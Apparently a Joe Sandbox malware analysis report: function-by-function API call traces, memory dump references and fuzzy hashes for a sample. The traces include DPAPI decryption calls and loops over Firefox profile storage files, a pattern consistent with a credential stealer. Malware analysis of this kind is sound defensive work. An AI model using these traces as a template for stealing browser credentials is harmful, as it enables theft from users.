                          • GetLocalTime.KERNEL32(?,?,00000000,0064A3D0,000000FF), ref: 00642BA2
                          • wsprintfA.USER32 ref: 00642BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: d374296cd14eab0689bd14fbcbc1e46e0c077198e21dbe40844957f1a097a789
                          • Instruction ID: 8aa2e0b3c0e88223f57d0daa5df21b6baa7043f8bea5f08afc802607b556ca75
                          • Opcode Fuzzy Hash: d374296cd14eab0689bd14fbcbc1e46e0c077198e21dbe40844957f1a097a789
                          • Instruction Fuzzy Hash: F8012DB2944628EBCB149BC9DD45BBEB7BCFB4CB12F00011AF645A2280E77C5440C7B1
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00629B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00629B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00629B61
                          • LocalFree.KERNEL32 ref: 00629B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: e71478463d7d13bba3a6a1b885c4f302a3e8de681f0c752117afe9909e586f8e
                          • Instruction ID: e63313e9172ce19ca39a0ee3afa8f6f93734531c20005b66285e40bb838e81ce
                          • Opcode Fuzzy Hash: e71478463d7d13bba3a6a1b885c4f302a3e8de681f0c752117afe9909e586f8e
                          • Instruction Fuzzy Hash: E2F01D71380722ABF7305F64AC49F977BA8EF44B52F200514FA49EE2D0D7B89840CAA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 42=$Vmyk$q.H
                          • API String ID: 0-3240525061
                          • Opcode ID: da3e804b2cb2b05717b1e00b59e1562af92df9e4405ea2dd9e561611018baea4
                          • Instruction ID: b4ca99927c24eb3564302635ade1b77103fa0c94f3a3c0cae8b0deb7563a30b1
                          • Opcode Fuzzy Hash: da3e804b2cb2b05717b1e00b59e1562af92df9e4405ea2dd9e561611018baea4
                          • Instruction Fuzzy Hash: 07B2C1F360C2049FE304AE2DEC8567AFBE9EF98720F16492DEAC5C3744E63558048697
                          APIs
                          • CoCreateInstance.COMBASE(0064B110,00000000,00000001,0064B100,?), ref: 0063CB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0063CB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 0063CBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: d25d88e2735c088e422387dd6f0212cca8bc7b4bf3c748992ff65d3b8d2fc664
                          • Instruction ID: d0f4788a5e75ba3bddcceb8465a25b07f61d0a8331779eff7676364b4f548b78
                          • Opcode Fuzzy Hash: d25d88e2735c088e422387dd6f0212cca8bc7b4bf3c748992ff65d3b8d2fc664
                          • Instruction Fuzzy Hash: 97316471A40614AFD710DB94CC86FAAB7B9AF88B10F104184FA04EB2D0D7B1AE44CB90
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00629B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00629BB3
                          • LocalFree.KERNEL32(?), ref: 00629BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 2fda9e6035c2fdb35ebc5c4874de21df81f71f1c29414a645a34a073afb2bce4
                          • Instruction ID: 9a48122511bdc647578db0efec2bf6dd7bc4225a4534f9f336b45a047ef2c51f
                          • Opcode Fuzzy Hash: 2fda9e6035c2fdb35ebc5c4874de21df81f71f1c29414a645a34a073afb2bce4
                          • Instruction Fuzzy Hash: E3011D75E41319ABE7109BA4DC45FAFB779EB84B02F104555EA04AB380DBB49A00CBE0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: jQr~$N3
                          • API String ID: 0-1848301192
                          • Opcode ID: b141c219ea1ce1498a1eb9e1aab916f032560f9dbb11336f8aa902021ffdb9f1
                          • Instruction ID: c2d6f1c7632818e6128ca35296e63e770115a2387c67246ace61676b1a932eec
                          • Opcode Fuzzy Hash: b141c219ea1ce1498a1eb9e1aab916f032560f9dbb11336f8aa902021ffdb9f1
                          • Instruction Fuzzy Hash: 905188F7D086008FF304AA29EC9573AB7D5DBE0720F2A863DDA84D73C0E97989054696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: I[{o
                          • API String ID: 0-3061306638
                          • Opcode ID: 815b4fbea0df2d4d0935503411838910503ec1fead4eec6db2f8c2b4e891bd23
                          • Instruction ID: d3714887d3a871de4f3844fed2763f69a8851cae6b1b2037f7b23c32763f0956
                          • Opcode Fuzzy Hash: 815b4fbea0df2d4d0935503411838910503ec1fead4eec6db2f8c2b4e891bd23
                          • Instruction Fuzzy Hash: B161F7F3A0C2045FE314AE69EC85736FBD9DB94320F16853EE6C4C3380E93998418696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Zb,W
                          • API String ID: 0-43614317
                          • Opcode ID: c1a22b2f53ad595167a48206b3e7c8ff2da1eb9101a5c88c2e7cc22c10e142c4
                          • Instruction ID: 68251d83556121868fc9238b125b90df36791c0eb9b18f28ef449dccbd558213
                          • Opcode Fuzzy Hash: c1a22b2f53ad595167a48206b3e7c8ff2da1eb9101a5c88c2e7cc22c10e142c4
                          • Instruction Fuzzy Hash: 05517FF3E096145FE3046D2CDC857BAF7DAEBD4321F16863DE68583744EA7558018681
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 49344e245fa2c07e3c2a8a52d6168f576e91ef942f6e5960c9731eef0b6b87a3
                          • Instruction ID: b7691460a9ed1d0a037dfb453755b94b6f9ec402384da024e9975d709cb6f98f
                          • Opcode Fuzzy Hash: 49344e245fa2c07e3c2a8a52d6168f576e91ef942f6e5960c9731eef0b6b87a3
                          • Instruction Fuzzy Hash: F67103B3A087148FF7046E28EC853A9B7E6EB84320F1B463DDED497780E97958058786
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a58951cc2309995b2f721cfa905557ef6ef4f031143b1f5b4e5be4c6e4000d67
                          • Instruction ID: f582a4e86063a2b968467246f1e65fe82539afad472fed35f65a0f206b4e8b1c
                          • Opcode Fuzzy Hash: a58951cc2309995b2f721cfa905557ef6ef4f031143b1f5b4e5be4c6e4000d67
                          • Instruction Fuzzy Hash: 905101B2608604AFE308BE29DC9577AB7E6FF94320F1A893DD6C587744EA385445CB43
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76bcc07483d76c1a3b143c245b20f11008f2f35a9685f1eb7ce84c4331163a3e
                          • Instruction ID: f73eb03736c108fa84068b84466314128630bc2a2b8e4b21b946f70f01480189
                          • Opcode Fuzzy Hash: 76bcc07483d76c1a3b143c245b20f11008f2f35a9685f1eb7ce84c4331163a3e
                          • Instruction Fuzzy Hash: 7141B7F3E082009FF315AE29DD8176ABBD6EBD4310F16853DDBD893384EA7958058786
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00638636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 006386AA
                          • StrStrA.SHLWAPI(?,0129DB58), ref: 006386CF
                          • lstrcpyn.KERNEL32(008593D0,?,00000000), ref: 006386EE
                          • lstrlen.KERNEL32(?), ref: 00638701
                          • wsprintfA.USER32 ref: 00638711
                          • lstrcpy.KERNEL32(?,?), ref: 00638727
                          • StrStrA.SHLWAPI(?,0129DA50), ref: 00638754
                          • lstrcpy.KERNEL32(?,008593D0), ref: 006387B4
                          • StrStrA.SHLWAPI(?,0129D990), ref: 006387E1
                          • lstrcpyn.KERNEL32(008593D0,?,00000000), ref: 00638800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: df3f96a1b815e4035c36ca1ffc66e0f76adeef2396e871f97a5644db63b558dc
                          • Instruction ID: 8e801c372aab83597ac6d5b7203f92e66eb348535d18a477d0413b5c292cbe23
                          • Opcode Fuzzy Hash: df3f96a1b815e4035c36ca1ffc66e0f76adeef2396e871f97a5644db63b558dc
                          • Instruction Fuzzy Hash: 0BF13872900614EFCB10DB68DD49ADAB7BAFF88342F144599F949E3351DF34AE058BA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621F9F
                          • lstrlen.KERNEL32(01298B40), ref: 00621FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00621FE3
                          • lstrlen.KERNEL32(00651794), ref: 00621FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062200E
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00622042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062204D
                          • lstrlen.KERNEL32(00651794), ref: 00622058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622075
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00622081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006220AC
                          • lstrlen.KERNEL32(?), ref: 006220E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622104
                          • lstrcat.KERNEL32(00000000,?), ref: 00622112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622139
                          • lstrlen.KERNEL32(00651794), ref: 0062214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062216B
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00622177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006221A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006221D4
                          • lstrlen.KERNEL32(?), ref: 006221EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062220A
                          • lstrcat.KERNEL32(00000000,?), ref: 00622218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622242
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062227F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0062228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006222B1
                          • lstrcat.KERNEL32(00000000,0129CEA8), ref: 006222B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006222F7
                          • lstrcat.KERNEL32(00000000), ref: 00622304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00622356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006223BF
                          • DeleteFileA.KERNEL32(00000000), ref: 006223F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 00622444
                          • FindClose.KERNEL32(00000000), ref: 00622453
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: ab6e23f8df4228cb3036004d271d60e4cf9c1198e0d33ca52c86df410bc63c94
                          • Instruction ID: 6f645b9d6fd11fa2a7fdcb5c5bea3407c159b7a3803fcdf5e8a9ec6672843c24
                          • Opcode Fuzzy Hash: ab6e23f8df4228cb3036004d271d60e4cf9c1198e0d33ca52c86df410bc63c94
                          • Instruction Fuzzy Hash: 84E19F70A11A27ABCB61EF65EC99ADE77BABF04301F040128F805A7615DB38DD45CF94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636445
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006364AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006364E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: be04e3535b2ccd3560c304d0e733b9902c40fcbe11e8eaab5bcabefd986b6974
                          • Instruction ID: 87a4a32b9c530f65ff16fcdb91380ba2e681f8f1909b729e9e3a87496e044b9c
                          • Opcode Fuzzy Hash: be04e3535b2ccd3560c304d0e733b9902c40fcbe11e8eaab5bcabefd986b6974
                          • Instruction Fuzzy Hash: 9CF1AD70D01A26ABCB61AF65E85AAEE77B6AF04301F048128F849D7351DB38DC45CFD4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006343A3
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006343D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 006343FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634409
                          • lstrlen.KERNEL32(\storage\default\), ref: 00634414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0063443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634498
                          • lstrcpy.KERNEL32(00000000,?), ref: 006344D7
                          • lstrcat.KERNEL32(00000000,?), ref: 006344DF
                          • lstrlen.KERNEL32(00651794), ref: 006344EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634507
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00634513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 0063451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00634547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 006345A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 006345A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634601
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634653
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063467B
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006346AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: 1d1e8adb9bc23fb95ed30400bb9935c0e57d096d91721c31475cc82a545b3a86
                          • Instruction ID: f7162a7ea6b2060ca7024780120e189ceca19fdc28f6b2b11b59f5e1e135060d
                          • Opcode Fuzzy Hash: 1d1e8adb9bc23fb95ed30400bb9935c0e57d096d91721c31475cc82a545b3a86
                          • Instruction Fuzzy Hash: 2BB1A370A11A26ABCB61EF75EC5AADEB7AAAF00301F041128F845D7751DF38EC458BD4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006357D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00635804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00635868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006358C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006358D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006358F8
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00635961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635988
                          • lstrlen.KERNEL32(00651794), ref: 0063599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006359B9
                          • lstrcat.KERNEL32(00000000,00651794), ref: 006359C5
                          • lstrlen.KERNEL32(0129CED8), ref: 006359D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006359F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00635A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00635A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635BB5
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00635BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 2d3bf161d34f9c029443e772bbeea8bcab67a9152da7f9cbd75d4c6a8e3cd353
                          • Instruction ID: 64bc3183c81c95c972c5c8552b9351e72714d90f528f6368c9421cfca1abd30f
